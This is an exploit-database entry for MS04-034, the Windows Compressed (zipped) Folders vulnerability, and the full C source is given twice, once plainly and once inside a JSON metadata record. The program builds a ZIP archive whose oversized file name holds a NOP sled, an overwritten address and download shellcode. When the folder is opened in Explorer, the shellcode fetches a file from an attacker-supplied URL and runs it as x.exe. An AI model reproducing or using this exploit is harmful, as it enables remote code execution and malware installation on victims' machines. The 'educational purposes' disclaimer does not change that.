ID EXPLOITPACK:00010CC377B71D394BD120D98429E524
Type exploitpack
Reporter tarako
Modified 2004-11-19T00:00:00
Description
Microsoft Windows - Compressed Zipped Folders (MS04-034)
/* Microsoft Windows Vulnerability in Compressed (zipped) Folders (MS04-034)
*
* Tested under Windows XP SP0 Spanish/English
*
* Original Advisory: http://www.eeye.com/html/research/advisories/AD20041012A.html
* Exploit Date: 21/10/2004
*
* Tarako - Haxorcitos.com 2004
*
* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
* AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
* WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
*
* Greetings to: #haxorcitos, #dsr and #localhost @efnet
*
*
* How to get new offsets:
* 1) attach debugger (i.e ollydbg) to explorer.exe
* 2) open the zip file as a folder and add or move some files to it
* 3) search in the explorer.exe memory the shellcode and get the addresses
*
*/
#include <stdio.h>
#include <windows.h>
#pragma pack(1)
#define DATOS "Tarako-Haxorcitos.com"
typedef struct {
DWORD Signature; // PK.. 4 bytes (0x04034B50)
WORD VersionNeeded;
WORD GeneralPurposeFlag; // para el data descriptor y demas
WORD CompressionMethod;
WORD ModFileTime;
WORD ModFileDate;
DWORD Crc32;
DWORD CompressedSize;
DWORD UncompressedSize;
WORD FilenameLength;
WORD ExtraFieldLength;
// filename (variable size)
// extra field (variable size)
}TOPHEADER;
typedef struct {
DWORD Signature; // PK.. 4 bytes (0x02014B50)
WORD MadeVersion;
WORD VersionNeeded;
WORD GeneralPurposeFlag; // para el data descriptor y demas
WORD CompressionMethod;
WORD ModFileTime;
WORD ModFileDate;
DWORD Crc32;
DWORD CompressedSize;
DWORD UncompressedSize;
WORD FilenameLength;
WORD ExtraFieldLength;
WORD FileCommentLength;
WORD DiskNumberStart;
WORD InternalFileAttributes;
DWORD ExternalFileAttributes;
DWORD RelativeOffsetOfLocalHeader;
// filename (variable size)
// extra field (variable size)
// file comment (variable size)
}MIDDLEHEADER;
typedef struct {
DWORD Signature; // PK.. 4 bytes (0x06054B50)
WORD NumOfThisDisk;
WORD NumDisckStartCentralDirectory;
WORD NumEntriesCentralDirOnThisDisk;
WORD TotalNumEntriesCentralDir;
DWORD SizeCentralDirectory;
DWORD OffsetCentraDirRespectStartDiskNum;
WORD ZipCommentLength;
// zipfile comment (variable size)
}BOTTOMHEADER;
/*
* download shellcode - RaiSe - raise@netsearch-ezine.com
*/
char shellcode1[] =
"\xEB\x5D\x5F\x8B\xF7\x80\x3F"
"\x08\x75\x03\x80\x37\x08\x47\x80\x3F\x01\x75\xF2\x33\xC9\xB5\x05\x8B\xFE\x2B\xF9"
"\x8B\xEF\xB5\x03\x2B\xF9\x8B\xD7\xB2\x7C\x8B\xE2\x89\x75\xFC\xB5\x40\xC1\xE1\x08"
"\x89\x4D\xF8\x8D\x49\x3C\x8B\x09\x03\x4D\xF8\x8D\x49\x7F\x41\x8B\x09\x03\x4D\xF8"
"\x8B\xD9\x8B\x49\x0C\x03\x4D\xF8\x81\x39\x4B\x45\x52\x4E\x74\x07\x8D\x5B\x14\x8B"
"\xCB\xEB\xEB\x33\xC0\x53\xEB\x02\xEB\x7C\x8B\x33\x03\x75\xF8\x80\x7E\x03\x80\x74"
"\x14\x8B\x3E\x03\x7D\xF8\x47\x47\x56\x8B\x75\xFC\x33\xC9\xB1\x0D\xF3\xA6\x5E\x74"
"\x06\x40\x8D\x76\x04\xEB\xE0\x5B\x8B\x5B\x10\x03\x5D\xF8\xC1\xE0\x02\x03\xD8\x8B"
"\x03\x89\x45\xF4\x8B\x5D\xFC\x8D\x5B\x0D\x53\xFF\xD0\x89\x45\xF0\x8D\x5B\x09\x53"
"\x8B\x45\xF4\xFF\xD0\x89\x45\xEC\x8B\x45\xF0\x8B\x40\x3C\x03\x45\xF0\x8B\x40\x78"
"\x03\x45\xF0\x89\x45\xE8\x8B\x40\x20\x03\x45\xF0\x8D\x7B\x08\x33\xD2\x57\x8B\x30"
"\x03\x75\xF0\x33\xC9\xB1\x0F\xF3\xA6\x74\x0B\x5F\xEB\x02\xEB\x7A\x42\x8D\x40\x04"
"\xEB\xE7\x8B\x5D\xE8\x33\xC9\x53\x5F\x8B\x7F\x24\x03\x7D\xF0\xD1\xE2\x03\xFA\x66"
"\x8B\x0F\x8B\x5B\x1C\x03\x5D\xF0\xC1\xE1\x02\x03\xD9\x8B\x1B\x03\x5D\xF0\x89\x5D"
"\xE4\x8B\x55\xFC\x8D\x52\x2D\x8D\x7D\xE0\x33\xC9\xB1\x06\x51\x52\x52\x8B\x75\xF0"
"\x56\xFC\xFF\xD3\xFD\xAB\x5A\x59\x38\x2A\x74\x03\x42\xEB\xF9\x42\xE2\xE8\xB1\x04"
"\x51\x52\x52\x8B\x75\xEC\x56\xFC\xFF\xD3\xFD\xAB\x5A\x59\x38\x2A\x74\x03\x42\xEB"
"\xF9\x42\xE2\xE8\xFC\x52\x33\xD2\xB6\x1F\xC1\xE2\x08\x52\x33\xD2\xEB\x02\xEB\x7C"
"\x52\x8B\x45\xD8\xFF\xD0\x5B\x89\x45\xB8\x33\xD2\x52\x52\x52\x52\x53\x8B\x45\xC8"
"\xFF\xD0\x89\x45\xB4\x8D\x7B\x08\x33\xD2\x52\xB6\x80\xC1\xE2\x10\x52\x33\xD2\x52"
"\x52\x57\x50\x8B\x45\xC4\xFF\xD0\x89\x45\xB0\x8D\x55\xAC\x52\x33\xD2\xB6\x1F\xC1"
"\xE2\x08\x52\x8B\x4D\xB8\x51\x50\x8B\x45\xC0\xFF\xD0\x8B\x4D\xB0\x51\x8B\x45\xBC"
"\xFF\xD0\x8B\x4D\xB4\x51\x8B\x45\xBC\xFF\xD0\x33\xD2\x52\x43\x43\x53\x8B\x45\xE0"
"\xFF\xD0\x89\x45\xA8\x8B\x7D\xAC\x57\x8B\x55\xB8\x52\x50\x8B\x45\xDC\xFF\xD0\x8B"
"\x55\xA8\xEB\x02\xEB\x17\x52\x8B\x45\xD4\xFF\xD0\x33\xD2\x52\x53\x8B\x45\xD0\xFF"
"\xD0\x33\xD2\x52\x8B\x45\xCC\xFF\xD0\xE8\x0D\xFE\xFF\xFF\x4C\x6F\x61\x64\x4C\x69"
"\x62\x72\x61\x72\x79\x41\x08\x4B\x45\x52\x4E\x45\x4C\x33\x32\x08\x57\x49\x4E\x49"
"\x4E\x45\x54\x08\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\x08\x5F"
"\x6C\x63\x72\x65\x61\x74\x08\x5F\x6C\x77\x72\x69\x74\x65\x08\x47\x6C\x6F\x62\x61"
"\x6C\x41\x6C\x6C\x6F\x63\x08\x5F\x6C\x63\x6C\x6F\x73\x65\x08\x57\x69\x6E\x45\x78"
"\x65\x63\x08\x45\x78\x69\x74\x50\x72\x6F\x63\x65\x73\x73\x08\x49\x6E\x74\x65\x72"
"\x6E\x65\x74\x4F\x70\x65\x6E\x41\x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x4F\x70\x65"
"\x6E\x55\x72\x6C\x41\x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x52\x65\x61\x64\x46\x69"
"\x6C\x65\x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x43\x6C\x6F\x73\x65\x48\x61\x6E\x64"
"\x6C\x65\x08\x72\x08\x78\x2E\x65\x78\x65\x08";
char shellcode2[] ="\x08\x01";
char offset[]="\x41\x41\x41\x41";
char jmpbelow[]= "\xeb\x06\x90\x90";
int main(int argc,char *argv[]) {
FILE *ZipFile;
TOPHEADER *Cabecera1;
MIDDLEHEADER *Cabecera2;
BOTTOMHEADER *Cabecera3;
DWORD c;
UINT i;
char *filename;
char *url;
printf("\n MS04-034 - Vulnerability in Compressed (zipped) Folders POC");
printf("\n Tarako - Tarako[AT]Haxorcitos.com\n");
if (argc!=2) {
printf("\n\n Usage: %s <URL> \n",argv[0]);
exit(1);
}
url=argv[1];
printf("\n * URL: %s",url);
if (!(ZipFile=fopen("prueba.zip","w+b"))) {
printf("\n [E] fopen()");
exit(1);
}
c=0x8000; // filename length
filename=(char*)malloc(sizeof(char)*c);
memset(filename,0,sizeof(filename));
for( i=0x0;i<c;i++) filename[i]=(BYTE)0x90;
memcpy(filename+0x1814,jmpbelow,strlen(jmpbelow));
memcpy(filename+0x1818,offset,strlen(offset));
memcpy(filename+0x7000,shellcode1,sizeof(shellcode1)-1);
memcpy(filename+0x7000+sizeof(shellcode1)-1,url,strlen(url));
memcpy(filename+0x7000+sizeof(shellcode1)+strlen(url)-1,shellcode2,sizeof(shellcode2)-1);
memcpy(filename+(c-4),".txt",4);
Cabecera1=(TOPHEADER*)malloc(sizeof(TOPHEADER));
Cabecera2=(MIDDLEHEADER*)malloc(sizeof(MIDDLEHEADER));
Cabecera3=(BOTTOMHEADER*)malloc(sizeof(BOTTOMHEADER));
memset(Cabecera1,0,sizeof(TOPHEADER));
memset(Cabecera2,0,sizeof(MIDDLEHEADER));
memset(Cabecera3,0,sizeof(BOTTOMHEADER));
///////////////////////////////////////////////////////////////////
// TOPHEADER
///////////////////////////////////////////////////////////////////
Cabecera1->Signature=0x04034B50; // DWORD
Cabecera1->VersionNeeded=0x000A; // WORD
Cabecera1->GeneralPurposeFlag=0x0002; // WORD para el data descriptor y demas
Cabecera1->CompressionMethod=0x0000; // WORD
Cabecera1->ModFileTime=0x1362; // WORD
Cabecera1->ModFileDate=0x3154; // WORD
Cabecera1->Crc32=0x85B36639; // DWORD
Cabecera1->CompressedSize=0x00000015; // DWORD
Cabecera1->UncompressedSize=0x00000015; // DWORD
Cabecera1->FilenameLength=(WORD)c; // WORD 0x0400;//strlen(filename);
Cabecera1->ExtraFieldLength=0x0000; // WORD
///////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////
// MIDDLEHEADER
///////////////////////////////////////////////////////////////////
Cabecera2->Signature=0x02014B50; // DWORD
Cabecera2->MadeVersion=0x0014; // WORD
Cabecera2->VersionNeeded=0x000A; // WORD
Cabecera2->GeneralPurposeFlag=0x0002; // WORD
Cabecera2->CompressionMethod=0x0000; // WORD
Cabecera2->ModFileTime=0x1362; // WORD
Cabecera2->ModFileDate=0x3154; // WORD
Cabecera2->Crc32=0x85B36639; // DWORD
Cabecera2->CompressedSize=0x00000015; // DWORD
Cabecera2->UncompressedSize=0x00000015; // DWORD
Cabecera2->FilenameLength=(WORD)c; // WORD 0x0400;//strlen(filename);
Cabecera2->ExtraFieldLength=0x0000; // WORD
Cabecera2->FileCommentLength=0x0000; // WORD
Cabecera2->DiskNumberStart=0x0000; // WORD
Cabecera2->InternalFileAttributes=0x0001; // WORD
Cabecera2->ExternalFileAttributes=0x00000020; // DWORD
Cabecera2->RelativeOffsetOfLocalHeader=0x00000000; // DWORD
///////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////
// BOTTOMHEADER
///////////////////////////////////////////////////////////////////
Cabecera3->Signature=0x06054B50; // DWORD
Cabecera3->NumOfThisDisk=0x0000; // WORD
Cabecera3->NumDisckStartCentralDirectory=0x0000; // WORD
Cabecera3->NumEntriesCentralDirOnThisDisk=0x0001; // WORD
Cabecera3->TotalNumEntriesCentralDir=0x0001; // WORD
Cabecera3->SizeCentralDirectory=sizeof(MIDDLEHEADER)+c; // DWORD
Cabecera3->OffsetCentraDirRespectStartDiskNum=sizeof(TOPHEADER)+strlen(DATOS)+c; // DWORD
Cabecera3->ZipCommentLength=0x0000; // WORD
///////////////////////////////////////////////////////////////////
fwrite(Cabecera1, sizeof(TOPHEADER), 1,ZipFile);
fwrite(filename, c, 1,ZipFile);
fwrite(DATOS,strlen(DATOS),1,ZipFile);
fwrite(Cabecera2, sizeof(MIDDLEHEADER), 1,ZipFile);
fwrite(filename, c, 1,ZipFile);
fwrite(Cabecera3, sizeof(BOTTOMHEADER), 1,ZipFile);
fclose(ZipFile);
printf("\n * prueba.zip created\n");
return 1;
}
// milw0rm.com [2004-11-19]
{"lastseen": "2020-04-01T19:04:32", "references": [], "description": "\nMicrosoft Windows - Compressed Zipped Folders (MS04-034)", "edition": 1, "reporter": "tarako", "exploitpack": {"type": "remote", "platform": "windows"}, "published": "2004-11-19T00:00:00", "title": "Microsoft Windows - Compressed Zipped Folders (MS04-034)", "type": "exploitpack", "enchantments": {"dependencies": {"references": [], "modified": "2020-04-01T19:04:32", "rev": 2}, "score": {"value": -0.4, "vector": "NONE", "modified": "2020-04-01T19:04:32", "rev": 2}, "vulnersScore": -0.4}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2004-11-19T00:00:00", "id": "EXPLOITPACK:00010CC377B71D394BD120D98429E524", "href": "", "viewCount": 1, "sourceData": "/* Microsoft Windows Vulnerability in Compressed (zipped) Folders (MS04-034)\n*\n* Tested under Windows XP SP0 Spanish/English\n*\n* Original Advisory: http://www.eeye.com/html/research/advisories/AD20041012A.html\n* Exploit Date: 21/10/2004\n*\n* Tarako - Haxorcitos.com 2004\n*\n* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED \"AS IS\"\n* AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION\n* WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.\n*\n* Greetings to: #haxorcitos, #dsr and #localhost @efnet\n*\n*\n* How to get new offsets:\n* 1) attach debugger (i.e ollydbg) to explorer.exe\n* 2) open the zip file as a folder and add or move some files to it\n* 3) search in the explorer.exe memory the shellcode and get the addresses\n*\n*/\n\n#include <stdio.h>\n#include <windows.h>\n\n#pragma pack(1)\n\n#define DATOS \"Tarako-Haxorcitos.com\"\n\ntypedef struct {\nDWORD Signature; // PK.. 4 bytes (0x04034B50)\nWORD VersionNeeded;\nWORD GeneralPurposeFlag; // para el data descriptor y demas\nWORD CompressionMethod;\nWORD ModFileTime;\nWORD ModFileDate;\nDWORD Crc32;\nDWORD CompressedSize;\nDWORD UncompressedSize;\nWORD FilenameLength;\nWORD ExtraFieldLength;\n// filename (variable size)\n// extra field (variable size)\n}TOPHEADER;\n\n\ntypedef struct { \nDWORD Signature; // PK.. 4 bytes (0x02014B50)\nWORD MadeVersion;\nWORD VersionNeeded;\nWORD GeneralPurposeFlag; // para el data descriptor y demas\nWORD CompressionMethod;\nWORD ModFileTime;\nWORD ModFileDate;\nDWORD Crc32;\nDWORD CompressedSize;\nDWORD UncompressedSize;\nWORD FilenameLength;\nWORD ExtraFieldLength;\nWORD FileCommentLength;\nWORD DiskNumberStart;\nWORD InternalFileAttributes;\nDWORD ExternalFileAttributes;\nDWORD RelativeOffsetOfLocalHeader;\n// filename (variable size)\n// extra field (variable size)\n// file comment (variable size)\n}MIDDLEHEADER;\n\ntypedef struct {\nDWORD Signature; // PK.. 4 bytes (0x06054B50)\nWORD NumOfThisDisk;\nWORD NumDisckStartCentralDirectory;\nWORD NumEntriesCentralDirOnThisDisk;\nWORD TotalNumEntriesCentralDir;\nDWORD SizeCentralDirectory;\nDWORD OffsetCentraDirRespectStartDiskNum;\nWORD ZipCommentLength;\n// zipfile comment (variable size)\n}BOTTOMHEADER;\n\n/*\n* download shellcode - RaiSe - raise@netsearch-ezine.com\n*/\nchar shellcode1[] =\n\"\\xEB\\x5D\\x5F\\x8B\\xF7\\x80\\x3F\"\n\"\\x08\\x75\\x03\\x80\\x37\\x08\\x47\\x80\\x3F\\x01\\x75\\xF2\\x33\\xC9\\xB5\\x05\\x8B\\xFE\\x2B\\xF9\"\n\"\\x8B\\xEF\\xB5\\x03\\x2B\\xF9\\x8B\\xD7\\xB2\\x7C\\x8B\\xE2\\x89\\x75\\xFC\\xB5\\x40\\xC1\\xE1\\x08\"\n\"\\x89\\x4D\\xF8\\x8D\\x49\\x3C\\x8B\\x09\\x03\\x4D\\xF8\\x8D\\x49\\x7F\\x41\\x8B\\x09\\x03\\x4D\\xF8\"\n\"\\x8B\\xD9\\x8B\\x49\\x0C\\x03\\x4D\\xF8\\x81\\x39\\x4B\\x45\\x52\\x4E\\x74\\x07\\x8D\\x5B\\x14\\x8B\"\n\"\\xCB\\xEB\\xEB\\x33\\xC0\\x53\\xEB\\x02\\xEB\\x7C\\x8B\\x33\\x03\\x75\\xF8\\x80\\x7E\\x03\\x80\\x74\"\n\"\\x14\\x8B\\x3E\\x03\\x7D\\xF8\\x47\\x47\\x56\\x8B\\x75\\xFC\\x33\\xC9\\xB1\\x0D\\xF3\\xA6\\x5E\\x74\"\n\"\\x06\\x40\\x8D\\x76\\x04\\xEB\\xE0\\x5B\\x8B\\x5B\\x10\\x03\\x5D\\xF8\\xC1\\xE0\\x02\\x03\\xD8\\x8B\"\n\"\\x03\\x89\\x45\\xF4\\x8B\\x5D\\xFC\\x8D\\x5B\\x0D\\x53\\xFF\\xD0\\x89\\x45\\xF0\\x8D\\x5B\\x09\\x53\"\n\"\\x8B\\x45\\xF4\\xFF\\xD0\\x89\\x45\\xEC\\x8B\\x45\\xF0\\x8B\\x40\\x3C\\x03\\x45\\xF0\\x8B\\x40\\x78\"\n\"\\x03\\x45\\xF0\\x89\\x45\\xE8\\x8B\\x40\\x20\\x03\\x45\\xF0\\x8D\\x7B\\x08\\x33\\xD2\\x57\\x8B\\x30\"\n\"\\x03\\x75\\xF0\\x33\\xC9\\xB1\\x0F\\xF3\\xA6\\x74\\x0B\\x5F\\xEB\\x02\\xEB\\x7A\\x42\\x8D\\x40\\x04\"\n\"\\xEB\\xE7\\x8B\\x5D\\xE8\\x33\\xC9\\x53\\x5F\\x8B\\x7F\\x24\\x03\\x7D\\xF0\\xD1\\xE2\\x03\\xFA\\x66\"\n\"\\x8B\\x0F\\x8B\\x5B\\x1C\\x03\\x5D\\xF0\\xC1\\xE1\\x02\\x03\\xD9\\x8B\\x1B\\x03\\x5D\\xF0\\x89\\x5D\"\n\"\\xE4\\x8B\\x55\\xFC\\x8D\\x52\\x2D\\x8D\\x7D\\xE0\\x33\\xC9\\xB1\\x06\\x51\\x52\\x52\\x8B\\x75\\xF0\"\n\"\\x56\\xFC\\xFF\\xD3\\xFD\\xAB\\x5A\\x59\\x38\\x2A\\x74\\x03\\x42\\xEB\\xF9\\x42\\xE2\\xE8\\xB1\\x04\"\n\"\\x51\\x52\\x52\\x8B\\x75\\xEC\\x56\\xFC\\xFF\\xD3\\xFD\\xAB\\x5A\\x59\\x38\\x2A\\x74\\x03\\x42\\xEB\"\n\"\\xF9\\x42\\xE2\\xE8\\xFC\\x52\\x33\\xD2\\xB6\\x1F\\xC1\\xE2\\x08\\x52\\x33\\xD2\\xEB\\x02\\xEB\\x7C\"\n\"\\x52\\x8B\\x45\\xD8\\xFF\\xD0\\x5B\\x89\\x45\\xB8\\x33\\xD2\\x52\\x52\\x52\\x52\\x53\\x8B\\x45\\xC8\"\n\"\\xFF\\xD0\\x89\\x45\\xB4\\x8D\\x7B\\x08\\x33\\xD2\\x52\\xB6\\x80\\xC1\\xE2\\x10\\x52\\x33\\xD2\\x52\"\n\"\\x52\\x57\\x50\\x8B\\x45\\xC4\\xFF\\xD0\\x89\\x45\\xB0\\x8D\\x55\\xAC\\x52\\x33\\xD2\\xB6\\x1F\\xC1\"\n\"\\xE2\\x08\\x52\\x8B\\x4D\\xB8\\x51\\x50\\x8B\\x45\\xC0\\xFF\\xD0\\x8B\\x4D\\xB0\\x51\\x8B\\x45\\xBC\"\n\"\\xFF\\xD0\\x8B\\x4D\\xB4\\x51\\x8B\\x45\\xBC\\xFF\\xD0\\x33\\xD2\\x52\\x43\\x43\\x53\\x8B\\x45\\xE0\"\n\"\\xFF\\xD0\\x89\\x45\\xA8\\x8B\\x7D\\xAC\\x57\\x8B\\x55\\xB8\\x52\\x50\\x8B\\x45\\xDC\\xFF\\xD0\\x8B\"\n\"\\x55\\xA8\\xEB\\x02\\xEB\\x17\\x52\\x8B\\x45\\xD4\\xFF\\xD0\\x33\\xD2\\x52\\x53\\x8B\\x45\\xD0\\xFF\"\n\"\\xD0\\x33\\xD2\\x52\\x8B\\x45\\xCC\\xFF\\xD0\\xE8\\x0D\\xFE\\xFF\\xFF\\x4C\\x6F\\x61\\x64\\x4C\\x69\"\n\"\\x62\\x72\\x61\\x72\\x79\\x41\\x08\\x4B\\x45\\x52\\x4E\\x45\\x4C\\x33\\x32\\x08\\x57\\x49\\x4E\\x49\"\n\"\\x4E\\x45\\x54\\x08\\x47\\x65\\x74\\x50\\x72\\x6F\\x63\\x41\\x64\\x64\\x72\\x65\\x73\\x73\\x08\\x5F\"\n\"\\x6C\\x63\\x72\\x65\\x61\\x74\\x08\\x5F\\x6C\\x77\\x72\\x69\\x74\\x65\\x08\\x47\\x6C\\x6F\\x62\\x61\"\n\"\\x6C\\x41\\x6C\\x6C\\x6F\\x63\\x08\\x5F\\x6C\\x63\\x6C\\x6F\\x73\\x65\\x08\\x57\\x69\\x6E\\x45\\x78\"\n\"\\x65\\x63\\x08\\x45\\x78\\x69\\x74\\x50\\x72\\x6F\\x63\\x65\\x73\\x73\\x08\\x49\\x6E\\x74\\x65\\x72\"\n\"\\x6E\\x65\\x74\\x4F\\x70\\x65\\x6E\\x41\\x08\\x49\\x6E\\x74\\x65\\x72\\x6E\\x65\\x74\\x4F\\x70\\x65\"\n\"\\x6E\\x55\\x72\\x6C\\x41\\x08\\x49\\x6E\\x74\\x65\\x72\\x6E\\x65\\x74\\x52\\x65\\x61\\x64\\x46\\x69\"\n\"\\x6C\\x65\\x08\\x49\\x6E\\x74\\x65\\x72\\x6E\\x65\\x74\\x43\\x6C\\x6F\\x73\\x65\\x48\\x61\\x6E\\x64\"\n\"\\x6C\\x65\\x08\\x72\\x08\\x78\\x2E\\x65\\x78\\x65\\x08\";\nchar shellcode2[] =\"\\x08\\x01\";\n\nchar offset[]=\"\\x41\\x41\\x41\\x41\";\nchar jmpbelow[]= \"\\xeb\\x06\\x90\\x90\";\n\nint main(int argc,char *argv[]) {\n\nFILE *ZipFile;\nTOPHEADER *Cabecera1;\nMIDDLEHEADER *Cabecera2;\nBOTTOMHEADER *Cabecera3;\n\nDWORD c;\nUINT i;\nchar *filename;\nchar *url;\n\nprintf(\"\\n MS04-034 - Vulnerability in Compressed (zipped) Folders POC\");\nprintf(\"\\n Tarako - Tarako[AT]Haxorcitos.com\\n\");\n\nif (argc!=2) {\nprintf(\"\\n\\n Usage: %s <URL> \\n\",argv[0]);\nexit(1);\n}\n\nurl=argv[1];\nprintf(\"\\n * URL: %s\",url);\n\n\nif (!(ZipFile=fopen(\"prueba.zip\",\"w+b\"))) {\nprintf(\"\\n [E] fopen()\");\nexit(1);\n}\n\nc=0x8000; // filename length\nfilename=(char*)malloc(sizeof(char)*c); \nmemset(filename,0,sizeof(filename));\n\nfor( i=0x0;i<c;i++) filename[i]=(BYTE)0x90;\n\nmemcpy(filename+0x1814,jmpbelow,strlen(jmpbelow));\nmemcpy(filename+0x1818,offset,strlen(offset));\n\nmemcpy(filename+0x7000,shellcode1,sizeof(shellcode1)-1);\nmemcpy(filename+0x7000+sizeof(shellcode1)-1,url,strlen(url));\nmemcpy(filename+0x7000+sizeof(shellcode1)+strlen(url)-1,shellcode2,sizeof(shellcode2)-1);\n\nmemcpy(filename+(c-4),\".txt\",4);\n\nCabecera1=(TOPHEADER*)malloc(sizeof(TOPHEADER));\nCabecera2=(MIDDLEHEADER*)malloc(sizeof(MIDDLEHEADER));\nCabecera3=(BOTTOMHEADER*)malloc(sizeof(BOTTOMHEADER));\nmemset(Cabecera1,0,sizeof(TOPHEADER));\nmemset(Cabecera2,0,sizeof(MIDDLEHEADER));\nmemset(Cabecera3,0,sizeof(BOTTOMHEADER)); \n\n///////////////////////////////////////////////////////////////////\n// TOPHEADER\n///////////////////////////////////////////////////////////////////\nCabecera1->Signature=0x04034B50; // DWORD\nCabecera1->VersionNeeded=0x000A; // WORD\nCabecera1->GeneralPurposeFlag=0x0002; // WORD para el data descriptor y demas\nCabecera1->CompressionMethod=0x0000; // WORD\nCabecera1->ModFileTime=0x1362; // WORD\nCabecera1->ModFileDate=0x3154; // WORD\nCabecera1->Crc32=0x85B36639; // DWORD\nCabecera1->CompressedSize=0x00000015; // DWORD\nCabecera1->UncompressedSize=0x00000015; // DWORD\nCabecera1->FilenameLength=(WORD)c; // WORD 0x0400;//strlen(filename);\nCabecera1->ExtraFieldLength=0x0000; // WORD\n///////////////////////////////////////////////////////////////////\n\n///////////////////////////////////////////////////////////////////\n// MIDDLEHEADER\n///////////////////////////////////////////////////////////////////\nCabecera2->Signature=0x02014B50; // DWORD\nCabecera2->MadeVersion=0x0014; // WORD\nCabecera2->VersionNeeded=0x000A; // WORD\nCabecera2->GeneralPurposeFlag=0x0002; // WORD\nCabecera2->CompressionMethod=0x0000; // WORD\nCabecera2->ModFileTime=0x1362; // WORD\nCabecera2->ModFileDate=0x3154; // WORD\nCabecera2->Crc32=0x85B36639; // DWORD\nCabecera2->CompressedSize=0x00000015; // DWORD\nCabecera2->UncompressedSize=0x00000015; // DWORD\nCabecera2->FilenameLength=(WORD)c; // WORD 0x0400;//strlen(filename);\nCabecera2->ExtraFieldLength=0x0000; // WORD\nCabecera2->FileCommentLength=0x0000; // WORD\nCabecera2->DiskNumberStart=0x0000; // WORD\nCabecera2->InternalFileAttributes=0x0001; // WORD\nCabecera2->ExternalFileAttributes=0x00000020; // DWORD\nCabecera2->RelativeOffsetOfLocalHeader=0x00000000; // DWORD\n///////////////////////////////////////////////////////////////////\n\n///////////////////////////////////////////////////////////////////\n// BOTTOMHEADER\n///////////////////////////////////////////////////////////////////\nCabecera3->Signature=0x06054B50; // DWORD\nCabecera3->NumOfThisDisk=0x0000; // WORD\nCabecera3->NumDisckStartCentralDirectory=0x0000; // WORD\nCabecera3->NumEntriesCentralDirOnThisDisk=0x0001; // WORD\nCabecera3->TotalNumEntriesCentralDir=0x0001; // WORD\nCabecera3->SizeCentralDirectory=sizeof(MIDDLEHEADER)+c; // DWORD\nCabecera3->OffsetCentraDirRespectStartDiskNum=sizeof(TOPHEADER)+strlen(DATOS)+c; // DWORD \nCabecera3->ZipCommentLength=0x0000; // WORD\n///////////////////////////////////////////////////////////////////\n\nfwrite(Cabecera1, sizeof(TOPHEADER), 1,ZipFile);\n\nfwrite(filename, c, 1,ZipFile); \nfwrite(DATOS,strlen(DATOS),1,ZipFile);\n\nfwrite(Cabecera2, sizeof(MIDDLEHEADER), 1,ZipFile);\nfwrite(filename, c, 1,ZipFile); \nfwrite(Cabecera3, sizeof(BOTTOMHEADER), 1,ZipFile);\n\nfclose(ZipFile);\nprintf(\"\\n * prueba.zip created\\n\");\nreturn 1;\n}\n\n// milw0rm.com [2004-11-19]", "cvss": {"score": 0.0, "vector": "NONE"}}
{}
